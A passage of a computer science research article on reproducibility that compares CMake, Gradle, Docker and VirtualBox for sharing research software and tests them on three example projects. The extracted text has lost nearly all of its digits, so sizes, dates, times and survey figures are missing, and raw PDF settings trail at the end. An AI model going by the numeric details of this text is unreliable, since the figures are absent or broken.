whereas simple artifacts do not require complex tools to run. in this section, we tackle our second research question by presenting four open source tools for sharing software artifacts, ranging from tools for compiling simple artifacts to sophisticated frameworks for sharing self-contained software environments. the tools have been selected despite of their different scopes because of their potential to support reproducible research. it has to be noted that a complex project might even incorporate multiple tools, for example a build system within a virtual environment. we begin with a discussion of simple tools, such as cmake, which are used for build management and continue by discussing tools utilizing a higher level of abstraction. for discussion purposes, well-known tools, each representing a class of tools with similar functionality, were selected. discussed pros and cons are valid not only for the discussed tool itself, but for the complete class represented by the tool. finally, we summarize the features of the different tools and discuss the importance of their benefits, according to the survey results presented in the section “survey”. cmake cmake is a cross-platform build tool based on c++. it is designed to be used with native build environments such as make. platform-independent build files are used to generate elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ compiler-specific build instructions, which define the actual build process. main features of cmake are tools for testing, building, and packaging software, as well as the support of hierarchical structures, automatic resolution of dependencies and parallel builds. one drawback of cmake and similar build management systems is that required libraries or other dependencies of software artifacts must be available and installed in the required version on the host system in order to successfully build the project. this could lead to extensive preparations for a build which is mandatory for executing software artifacts. cmake has been chosen for discussion because it is one of the most used tools of this type. tools with similar functionality are configure scripts, the gnu build system and the waf build automation system. gradle gradle is a general purpose build tool based on java and groovy. gradle integrates the build tools maven as well as ant and can replace or extend both systems. main features of gradle are the support for maven repositories for dependency resolution and installation and the out of the box support for common tasks, that is, building, packaging and reporting. gradle supports multiple programming languages, but has a strong focus on java, especially as it is the recommended build system for android development. an integrated wrapper system allows to use gradle for building software artifacts without installing gradle. dependency installations and versions are maintained automatically. if a build requires a new version of a library, it is downloaded and installed automatically. the automated dependency installation is a great benefit of gradle, although there are still some challenges to overcome. one issue is that automated dependency installation only works, if the required libraries are offered in an online repository. if the required dependency is removed from the online repository, building any software depending on this library becomes impossible. for other programming languages, tools with similar functionality are available, that is, the node package manager for javascript projects or pip for python projects. docker the open source software docker allows packaging software applications including code, system tools, and system libraries into a single docker image. the resulting image can be published, downloaded and executed on various systems without operating system restrictions in a virtualized environment. this way, an application embedded in a docker image will execute in a predefined way, independent of the software environment installed on the host computer. the only requirement for the host system is the installed docker engine. a docker image is a kind of lightweight virtual machine image. it could contain the runtime environment for a single application with or without graphical user interface, but it could also contain a ready to deploy server application for web services or even environments for heavy calculations or simulations. when running the docker image, a docker container is launched. a docker container can be seen as an isolated runtime elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ environment, which uses the kernel of the host operating system and thereby becomes more lightweight than traditional virtual machines. a running docker container can be accessed via a terminal or a graphical user interface allowing for a broad range of applications. docker images can be shared in two different ways. the first way is to export a running container including all files and executables as image and to share it as a single file. this file can be large in size but is fast to launch by others. the second way is to create a so-called dockerfile. dockerfiles contain the building instructions for docker images. these instructions include commands for installing required dependencies and for installing the shared software artifact itself. when building a docker image from a dockerfile, all instructions from the dockerfile are automatically executed. this leads to a small dockerfiles, but a more complex import process. in addition, when using dockerfiles, all dependencies need to be available either in online repositories, or locally on the machine building the image. the commercial docker hub platform (https://hub.docker.com/, last visited - - ) streamlines the process for sharing docker images. docker provides tools to share images on docker hub and to download images from docker hub via the command-line. docker hub offers the possibility of sharing public docker images without download restrictions for free, but also paid plans allowing creating private repositories for sharing images among small groups. the major difference between docker and the previously presented tools is that docker is not usually used for the development of an artifact. in most cases, a docker image is created for sharing a predefined environment in a team. this means that the image is created and the software artifact is deployed in the container afterward. an alternative to docker is using linux containers, which allow to run multiple isolated linux systems on a single host. virtualbox virtualbox is an open source software for the virtualization of an entire operating system. virtualbox emulates a predefined hardware environment, where multiple operation systems, like windows, mac os, and most unix systems can be installed. the installed operating system is stored as persistent image, which allows the installation and configuration of software. once the image is created, it can be shared and executed on multiple machines. as mentioned before, virtualbox emulates the entire hardware of a computer resulting in higher execution overhead as well as higher setup effort. before the scientific software artifact can be installed in a virtualbox container, an operating system and all dependencies have to be installed. a non-open source alternative to virtualbox is vmware, which has similar functionality. comparison of analyzed tools after the presentation of selected tools in the last section, we now want to compare their features for sharing scientific software artifacts. as criteria for the comparison, we focus in this section on important aspects of software for researchers, according to the survey elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://hub.docker.com/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ presented in the section “survey”. table briefly summarizes our findings; a description of each criteria is found throughout this section. the ratings in table are based on qualitative comparisons, as well as on our experience from using the tools for making three different research projects reproducible, as elaborated in the section “examples”. security as indicated by the survey, local computer and data security is a major concern for many researchers. some software artifacts require administrator access rights on the local machine in order to be executed. these access rights allow malicious behavior, which could lead to unwanted consequences on the local machine or on the local network. virtualbox and docker execute software artifacts in sandboxed environments and therefore allow the secure execution of software artifacts. tools like cmake and gradle do not offer this security mechanism. when executing a shared software artifact from untrusted sources, a sandboxed environment is recommended. supported platforms cmake, docker, and virtualbox are compatible with most linux platforms, recent versions of macos, and selected versions of windows . gradle works as long as the java virtual machine is available. besides this platform support it has to be kept in mind that the software artifacts itself could require a certain operating system. this problem can be mitigated through virtualization of docker and virtualbox. required knowledge for sharing if a build management tool is used in the development of a scientific software artifact, we assume that the researchers are familiarized with the build management tool during the development phase. therefore, no additional knowledge for the researcher who is sharing the artifact is required. virtualbox also does not require a lot of additional background information. everybody who is able to install an operating system is able to share a software artifact embedded in a virtualbox image. the terminology of docker seems to be confusing at first glance, requiring some time to become familiar with docker concepts. table comparison of tools for sharing scientific software artifacts. tool cmake gradle docker virtualbox security no security mechanisms no security mechanisms sandboxed environment sandboxed environment supported platforms linux, macos, windows java vm linux, macos, windows linux, macos, windows required knowledge for sharing little little moderate little effort for sharing little little moderate high required knowledge for installation and execution moderate moderate little little effort for installation and execution moderate/high little little little size of shared object small small up to multiple gbs up to multiple gbs limitations installation could be exhausting specific gradle project structure recommended gui requires extra effort images always include the entire operating system elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effort for sharing cmake, gradle, and other build management systems are intended to define a standardized build process. if a build management system is used during the development of the scientific software artifact, no additional effort arises for sharing. the configuration file for the build management system can be shared along the source code of the software artifact. docker and virtualbox are usually not directly involved in software development. in most cases, a docker or virtualbox image has to be created explicitly for sharing the software artifact. the structured process of building a docker container allows easy reuse of existing docker containers for other software artifacts. in the case of virtualbox, the whole virtualbox image has to be shared on a file server. docker images can be shared on the free to use docker hub or on a file server. alternatively, a dockerfile, which contains the building instructions for a docker image, can be created and shared as a text file. however, using a dockerfile requires all dependencies being available in repositories, adding additional complexity to the overall process. required knowledge for installation and execution researchers are often not familiar with the tools used for the creation of software artifacts. reading the documentation of build management tools can be exhausting and time- consuming for the short test of an artifact. cmake and gradle require some knowledge in order to build a software artifact, especially if errors appear. virtualbox and docker are easier to use. if a docker image is hosted on dockerhub, a single command is sufficient for downloading and running the image. if this command is provided, no additional knowledge is required. due to a graphical user interface, running a virtualbox image is even easier. effort for installation and execution according to the survey results, ease of installation is a major consideration for most researchers ( of participants). regarding the installation of the used tool itself, gradle has the lowest requirements. the gradle wrapper allows installing dependencies and the build of artifacts without installing gradle itself. for installing and executing the shared software artifact, the highest effort arises when using cmake, where required dependencies have to be installed manually. for building and executing software artifacts with gradle only a few commands are required. docker and virtualbox require the least effort; the shared image only needs to be executed. size of shared object when using cmake or gradle, the source code of the software artifact and the configuration file of the build management tool have to be shared, which usually leads to small shared objects. the shared image of docker or virtualbox has to contain the source code and all other tools which are required for execution, such as the operating system. this results in large shared objects, in some cases the size of a docker image exceeds one gigabyte. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ alternatively, docker provides an option allowing for smaller shared objects— dockerfiles. a dockerfile contains only text instructions for building a docker image. therefore, the size of a dockerfile is only a few kilobytes, but once executed, docker automatically pulls the artifact’s source code from provided repositories and builds the software artifact, resulting in a large docker image on the local machine. nevertheless, the size of the download is not a major concern for the majority of the survey participants. limitations all analyzed tools have limitations. cmake is a lightweight tool for software development, but the effort for installing the dependencies of a software artifact could be extensive. furthermore, it is only applicable for a handful of programming languages such as c or c++. when gradle is chosen as build system early in the development phase, it is perfectly suited for java projects. using gradle for existing projects can be cumbersome because it requires additional configuration for projects that do not comply with gradle’s default project structure. especially for researchers that are not familiar with gradle, the time spent for this additional configuration step should not be neglected. docker is perfectly suited for command-line or web applications, which is the case for a huge amount of scientific software artifacts. additional configuration is required to support guis of desktop applications. frevo (see the section “frevo”), used in one of our examples, demonstrates gui support for desktop applications with docker. virtualbox is applicable for all types of software artifacts, but the overhead of creating and sharing a virtualbox image could be huge. for sharing an artifact, independent of its size and complexity, a complete operating system has to be installed and shared. examples after introducing background information in the last sections, three examples are presented analyzing the applicability of various tools for sharing software artifacts. three scientific artifacts from different computer science research areas allowed us to focus on various types of artifacts with different build systems and procedures for sharing. the first example—stochastic adaptive forwarding—is a simulation scenario, which can be executed on a command line in order to conduct performance evaluations. second, frevo is a simulation tool, mainly controlled via a graphical user interface. the third example—liresolr—is a server-based application used for image retrieval. stochastic adaptive forwarding stochastic adaptive forwarding (saf) (posch, rainer & hellwagner, ) is a forwarding strategy for the novel internet architecture named data networking (ndn) (zhang et al., ). forwarding strategies in ndn are responsible for forwarding packets to neighboring nodes and therefore select the paths of traffic flows in the network. the network forwarding daemon (nfd) implements the networking functionalities of ndn. it is written in c++ and uses the waf build automation system. the network simulator ns- /ndnsim (mastorakis et al., ) is used for testing purposes, which also uses the waf build system. for testing saf in the simulation environment three steps are required: (i) installation of the nfd; (ii) installation of the network simulator elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ns- /ndnsim and finally (iii) patching saf into a compatible version of the nfd. the installation of saf was tested and analyzed in the standard way by using waf and docker. saf with waf the standard way of developing ndn forwarding strategies is by using the waf build automation system. the functionality of the waf build system is similar to the functionality of cmake. this means that waf automatically resolves dependencies, but the installation of dependencies must be performed manually. although extensive installation instructions were published (https://github.com/danposch/saf, last visited - - ), it is tricky to install the simulator and its dependencies. furthermore, there are slightly undocumented differences when installing the ndn framework on different unix versions. once the ndn framework is compiled in the correct version, it is easy to patch saf. nevertheless, it can take up to several hours to initially install and compile the ndn framework with saf. saf with docker named data networking and saf are licensed under gpl v , meaning that there are no legal concerns over packaging the software. technically, docker provides two options for creating and sharing images. the first is to check out a preconfigured image like ubuntu linux from the docker website and connect to it via terminal. all required changes can be made in the terminal and finally persisted with a commit. the altered image can be shared via the docker website or as binary file. the second possibility to create the image is by using dockerfiles. these files contain simple creation instructions for images and can be shared easily due to their small size. to build an image, the dockerfile can be executed on any host with the docker framework installed. both variants were tested for saf. the resulting images, containing all dependencies and the compiled software artifacts, have a size of about . gb with the size of the dockerfile being about two kb. using the precompiled image (https://hub.docker.com/r/ phmoll/safprebuild/, last visited - - ), running the image only takes an instant. the execution of the dockerfile takes, depending on the internet connection and the computing power of the host system, between and min. once the image is running, the results of the paper can be reproduced or new experiments with saf can be conducted using the provided network simulator. frevo frevo (sobe, fehérvári & elmenreich, ) is an open source framework to help engineers and scientists in evolutionary design or optimization tasks to create a desired swarm behavior. the major feature of frevo is the component-wise decomposition and separation of the key building blocks for an optimization task. this structure enables the components to be designed separately allowing the user to easily swap and evaluate different configurations and methods or to connect an external simulation tool. frevo is typically used for evolving swarm behavior for a given simulation (fehervari & elmenreich, ; monacchi, zhevzhyk & elmenreich, ). frevo is a mid-sized project with k lines of mostly java code, having a graphical interface as well as a mode for pure command line operation, for example, to be used on a simulation server. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/danposch/saf https://hub.docker.com/r/phmoll/safprebuild/ https://hub.docker.com/r/phmoll/safprebuild/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the component-based structure allows to easily extend and remove components (e.g., a simulation, a type of neural network, an optimization algorithm), which sometimes creates some effort in newly setting up frevo. frevo was tested and analyzed with the following three tools: frevo with build script until recently, frevo was provided as a download zip file (http://frevo.sourceforge.net/, last visited: - - ) that included sources of the main program and additional components together with an ant build file. however, there had been problems in the past with different language versions of java. a further problem can be dependencies on third party tools or libraries, which are not automatically maintained by this type of build script. frevo with gradle an analysis showed that the current structure of frevo, especially due to its component- plug-in-architecture, conflicts with the expected and possible project structure for gradle. frevo with docker since frevo and its components are open source under gpl v , there was neither a legal nor a technical problem to put it into a virtual docker container. we used an ubuntu linux system that was provided by docker. openjdk was installed as java runtime environment. after installing frevo in the docker system, it was pushed onto the free docker hub hosting platform (https://hub.docker.com/r/frodewin/frevo/, last visited: - - ). to reproduce a result made with frevo it thus possible to (given that docker is installed) download and execute the respective docker container. in general, the result was easily usable, apart from some effort to get a graphical display working. the parallelization of simulation, which is a natural ability of frevo, works fine as well inside a docker container. the docker image containing frevo has a compressed size of mb, which is mostly due to the files of ubuntu linux. liresolr liresolr (lux & macstravic, ) is an extension for the popular apache solr (http://lucene.apache.org/solr/, last visited - - ) text retrieval server to add functionality for visual information retrieval. it adds support for indexing and searching images based on image features and is for instance in use by the world intellectual property organisation, a un agency, within the global brand db (http://www.wipo.int/ branddb/en/, last visited - - ) for retrieval of similar visual trademarks. liresolr brings the functionality of the lire library (lux & marques, ) to the popular search server. while lire is a library for visual information retrieval based on inverted indexes, it is research driven and intented to be integrated with local java applications. apache solr is more popular than the underlying inverted index system, lucene, as it allows to modularize retrieval functionality by providing a specific retrieval server with cloud functionality and multiple apis to access it for practical use. liresolr is intended for people who need out of the box visual retrieval methods without the need for integrating a library in their applications. it can be called from any mobile, elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://frevo.sourceforge.net/ https://hub.docker.com/r/frodewin/frevo/ http://lucene.apache.org/solr/ http://www.wipo.int/branddb/en/ http://www.wipo.int/branddb/en/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ server or desktop platform and runs on systems with a java runtime. this flexibility is valued among researchers as well as practitioners. liresolr is hosted on github (https://github.com/dermotte/liresolr, last visited - - ). gradle and docker build files are part of the repository. liresolr with gradle the standard method of building liresolr is by using gradle. current ides can import gradle build files; any task can be done from within the ide. while gradle makes sure that the right version for each library is downloaded and everything is ready to build, installing the new features to the solr server has to be done manually. the supporting task in gradle just exports the necessary jar files. the user or developer has to install solr, then create a solr core, change two configuration files, copy the jars and restart the server to complete the installation. while these steps are extensively described in the documentation, it still presents a major effort for new users without prior experience of retrieval in general or using apache solr. liresolr with docker as liresolr is extending solr by adding additional functionality, the intuitive way to create a docker container is to extend the solr docker container. the dockerfile defining the build of the docker container is part of the liresolr repository, where a specific gradle task is building and preparing relevant files for the creation of the image. this includes the aforementioned jars and config files as well as a pre prepared solr core and a small web application as a client. the docker container can easily be run and provides basic functionality for digital image search. developers who just want to test liresolr can get it running within seconds using docker hub (https://hub.docker.com/r/dermotte/liresolr/, last visited: - - ). one tool to reproduce them all? in the previous sections, we presented tools for sharing software artifacts and examples showing how the tools can be applied in order to share scientific software artifacts. in this section, we now reflect on the advantages and shortcomings of the tools with respect to the results from our survey presented in the section “survey”. each of the presented tools has its pros and cons. for instance, the additional effort for sharing an artifact when using a build management tool is very low because in most cases a build management tool is used during the creation of the artifact. in contrast, it can be challenging and time-consuming for other researchers to get the build management tool up and running because required dependencies or the installation process may not be documented in detail. software artifacts, which are provided as virtualized containers are easy to run and provide a high degree of security but are inconvenient in case a researcher wants to build upon previously published software artifacts. when weighing these advantages and shortcomings we quickly see that the one tool to reproduce all our scientific results does not exist. nevertheless, based on our findings from the survey we now want to give recommendations for creating reproducible results and scientific software artifacts which can be easily used by other researchers. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dermotte/liresolr https://hub.docker.com/r/dermotte/liresolr/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the survey clearly showed that many researchers are interested in building their research on the work of others, which becomes much easier, when published software artifacts can be reused. furthermore, we saw that the average time researchers are willing to invest to get artifacts running is only about two days. thus, we assume that it is very important for researchers to get the artifact running quickly, otherwise, researchers lose interest in using the artifact and start developing their own solution. when taking the demand for security into account, we see that virtualized containers appear to be a good choice. the provided software artifact can be executed without the overhead of installing it, by simply running the container. furthermore, it is possible to become familiar with the artifact in the virtualized environment and check if the artifact is suitable to base own work on it. our findings mostly discuss the researchers’ perspective working on original research questions. the role of a reviewer in a peer review process has not be discussed in the same detail, but we assume that it is similar to researcher’s demands, but with even more demanding time constraints. when researchers decide to build on the artifact, it may be cumbersome to continue using a virtualized container, because altering a software artifact is more convenient on a local system. this means that the researcher has to install the artifact locally, without virtualized container. according to our study, researchers currently prefer providing detailed instructions and build tools. solely relying on this information, it could be challenging to install the artifact, as already discussed. dockerfiles are one solution to overcome this issue. as already explained, a dockerfile is a kind of a construction guideline for docker containers. it contains all command line directives, which are required to build a docker container and can therefore be seen as exact procedure for the local installation of an artifact. following the commands listed in the dockerfile, local installation of a software artifact is relatively easy. these commands ensure that all dependencies are installed correctly, otherwise it would not be possible to create a docker container. this means that by providing a dockerfile, both options become possible, software artifacts can be executed in a secure container, but can also be easily installed by following instructions from the dockerfile. another finding of our survey is that the long-term availability of software artifacts is important for researchers and should be around years. in addition, the acm artifact reviewing and badging guideline (https://www.acm.org/publications/policies/ artifact-review-badging, last visited - - ) emphasizes the importance of being able to reproduce results after a long time, by providing a separate badge for artifacts which are archived in archival repositories. when looking at our presented tools, we can see technical, as well as legal issues on the way to achieve long term availability. although services, such as code ocean (https://codeocean.com/, last visited - - ) or dryad (https://datadryad.org/, last visited - - ), are available for archiving software artifacts, the following points should be kept in mind. tools such as gradle rely on online repositories for downloading required dependencies. if only one of the required dependencies becomes unavailable, the build fails. this means that all dependencies, as well as all required tools have to be included when the artifact is archived. this leads to technical issues, because the elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.acm.org/publications/policies/artifact-review-badging https://www.acm.org/publications/policies/artifact-review-badging https://codeocean.com/ https://datadryad.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ amount of required tools to reproduce a result could be tremendously high. for instance, if a required operating system or compiler is no longer available, the results can not be reproduced, which means that even these tools must to be archived. besides this technical issue, packaging these tools could lead to legal issues as well when tools with limiting licenses are used. furthermore, operators of platforms for archiving software could decide to discontinue service. this would result in loss of all artifacts archived by this provider. conclusion this article reflects on the reproducibility of research results in computer science. we collected the opinions and requirements of researchers via an online survey. focusing on our research question rq (“to what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?”), analysis of the survey’s results confirmed our initial assumption that the reproducibility of research results is an important concern in computer science research. besides, researchers not only want to reproduce results but also want to base their work on the results of others. the main reasons for the importance of reproducibility are improved credibility and improved understanding of results. using established commercial models, as they are common for scientific publications, was seen as critical. moreover, the majority of survey participants showed a willingness to use open source tools for making their results accessible and reproducible. based on the researchers’ opinions, we created guidelines which aid researchers in making their research reproducible. the applicability of various tools for publishing software artifacts was discussed while keeping our guidelines in mind. scientific artifacts of different research areas in computer science were used to test the applicability of discussed tools for sharing reproducible research. regarding research question rq (“what tools can be used to support reproducibility?”), we identified a conflict between comprehensibility and simplicity of using a tool vs security measures avoiding to compromise one’s system when testing foreign code. available tools provide a variety of possible solutions, however, we could not identify a single tool fulfilling all requirements. finally, we discussed our findings and concerns on the process of publishing reproducible research. according to our study, the long-term availability of reproducible results is of great importance to many researchers, but we identified open issues in achieving availability for longer periods. even if reproducibility of research is not common practice yet, we recognized a strong positive shift toward reproducible research, backed not only by individual researchers, but also by renowned scientific journals and publishers. with this work already leading to new insights regarding reproducibility, it also installs a beachhead for future research. with the survey as input and the discussions regarding the interpretation we identified the context of a researcher as a hypothetically highly influential factor on the view on reproducibility. so how do for instance not only cultural, geographical, and project background of a researcher, but also the research area as well as the research communities influence the willingness to investigate extra time in making results reproducible? future work could also address the question whether and to what extend project size would influence the willingness to invest time into reproducing work. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ acknowledgements we would like to thank all participants of the survey for their valuable input and all colleagues who helped us by sharing their practical experience and discussion. we thank the anonymous reviewers for their constructive comments on a previous version of the article. we are grateful to lizyy dawes for proofreading an earlier version of this article. additional information and declarations funding this work was supported by the austrian science fund (fwf) under the chist-era project concert (project no. i ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: austrian science fund (fwf) under the chist-era project concert: i . competing interests the authors declare that they have no competing interests. author contributions � wilfried elmenreich conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � philipp moll conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � sebastian theuermann conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � mathias lux conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: links to the tools used are available in the article. this includes data and code produced by us as well as code from others where we have built upon. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the following repositories contain parts deposited for the article: docker images: https://hub.docker.com/r/phmoll/saf-prebuild/ https://hub.docker.com/r/dermotte/liresolr/ https://hub.docker.com/r/frodewin/frevo/ we used a version of frevo software, sourceforge: http://frevo.sourceforge.net/. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references allen a, schmidt j. . looking before leaping: creating a software registry. journal of open research software ( ):e doi . /jors.bv. arbona a, artigues a, bona-casas c, massó j, miñano b, rigo a, trias m, bona c. . simflowny: a general-purpose platform for the management of physical models and simulation problems. computer physics communications ( ): – doi . /j.cpc. . . . boettiger c. . an introduction to docker for reproducible research. sigops operating systems review ( ): – . bonaventure o. . the january issue. sigcomm computer communication review ( ): – . brinckman a, chard k, gaffney n, hategan m, jones mb, kowalik k, kulasekaran s, ludäscher b, mecum bd, nabrzyski j, stodden v, taylor ij, turk mj, turner k. . computing environments for reproducibility: capturing the “whole tale”. future generation computer systems : – doi . /j.future. . . . casadevall a, fang fc. . reproducible science? infection and immunity ( ): – . chirigati f, shasha d, freire j. . reprozip: using provenance to support computational reproducibility. in: proceedings of the th usenix workshop on the theory and practice of provenance, tapp ’ . berkeley: usenix association, : – : . cito j, ferme vc, gall h. . using docker containers to improve reproducibility in software and web engineering research. in: ieee/acm th international conference on software engineering companion (icse-c). new york: acm, – . fehervari i, elmenreich w. . evolving neural network controllers for a team of self-organizing robots. journal of robotics : doi . / / . flittner m, mahfoudi mn, saucez d, wählisch m, iannone l, bajpai v, afanasyev a. . a survey on artifacts from conext, icn, imc, and sigcomm conferences in . sigcomm computer communication review ( ): – . hanson b, sugden a, alberts b. . making data maximally available. science ( ): doi . /science. . janin y, vincent c, duraffort r. . care, the comprehensive archiver for reproducible execution. in: proceedings of the st acm sigplan workshop on reproducible research methodologies and new publication models in computer engineering, trust ’ . new york: acm, : – : . elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://hub.docker.com/r/phmoll/saf-prebuild/ https://hub.docker.com/r/dermotte/liresolr/ https://hub.docker.com/r/frodewin/frevo/ http://frevo.sourceforge.net/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jors.bv http://dx.doi.org/ . /j.cpc. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lux m, macstravic g. . the lire request handler: a solr plug-in for large scale content based image retrieval. in: gurrin c, hopfgartner f, hurst w, johansen h, lee h, o’connor n, eds. multimedia modeling: th anniversary international conference, mmm , dublin, ireland, january - , . cham: springer international publishing, – . lux m, marques o. . visual information retrieval using java and lire. synthesis lectures on information concepts, retrieval, and services ( ): – . mastorakis s, afanasyev a, moiseenko i, zhang l. . ndnsim : an updated ndn simulator for ns- . technical report ndn- , revision , ndn. mcmurdie pj, holmes s. . phyloseq: an r package for reproducible interactive analysis and graphics of microbiome census data. plos one ( ): – doi . /journal.pone. . monacchi a, zhevzhyk s, elmenreich w. . hems: a home energy market simulator. computer science—research and development ( ): – . morin a, urban j, adams pd, foster i, sali a, baker d, sliz p. . shining light into black boxes. science ( ): – doi . /science. . peng rd. . reproducible research in computational science. science ( ): – doi . /science. . poline j-b, breeze jl, ghosh s, gorgolewski k, halchenko yo, hanke m, haselgrove c, helmer kg, keator db, marcus ds, poldrack ra, schwartz y, ashburner j, kennedy dn. . data sharing in neuroimaging research. frontiers in neuroinformatics : doi . /fninf. . . posch d, rainer b, hellwagner h. . saf: stochastic adaptive forwarding in named data networking. ieee/acm transactions on networking ( ): doi . /tnet. . . ram k. . git can facilitate greater reproducibility and increased transparency in science. source code for biology and medicine ( ): doi . / - - - . shrader-frechette k, oreskes n. . symmetrical transparency in science. science ( ): – doi . /science. . . . sobe a, fehérvári i, elmenreich w. . frevo: a tool for evolving and evaluating self- organizing systems. in: proceedings of the st international workshop on evaluation for self-adaptive and self-organizing systems, lyon. – . steiniger s, hunter aj. . the free and open source gis software map—a guide to facilitate research, development, and adoption. computers, environment and urban systems : – doi . /j.compenvurbsys. . . . vitek j, kalibera t. . repeatability, reproducibility and rigor in systems research. in: proceedings of the th international conference on embedded software emsoft , taipei. – . walters wp. . modeling, informatics, and the quest for reproducibility. journal of chemical information and modeling ( ): – doi . /ci w. witten dm, tibshirani r. . scientific research in the age of omics: the good, the bad, and the sloppy. journal of the american medical informatics association ( ): – doi . /amiajnl- - . zhang l, afanasyev a, burke j, jacobson v, claffy k, crowley p, papadopoulos c, wang l, zhang b. . named data networking. sigcomm computer communication review ( ): – . elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /science. http://dx.doi.org/ . /science. http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /tnet. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /j.compenvurbsys. . . http://dx.doi.org/ . /ci w http://dx.doi.org/ . /amiajnl- - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ making simulation results reproducible-survey, guidelines, and examples based on gradle and docker introduction related work survey requirements and general guidelines existing tools examples one tool to reproduce them all? conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee 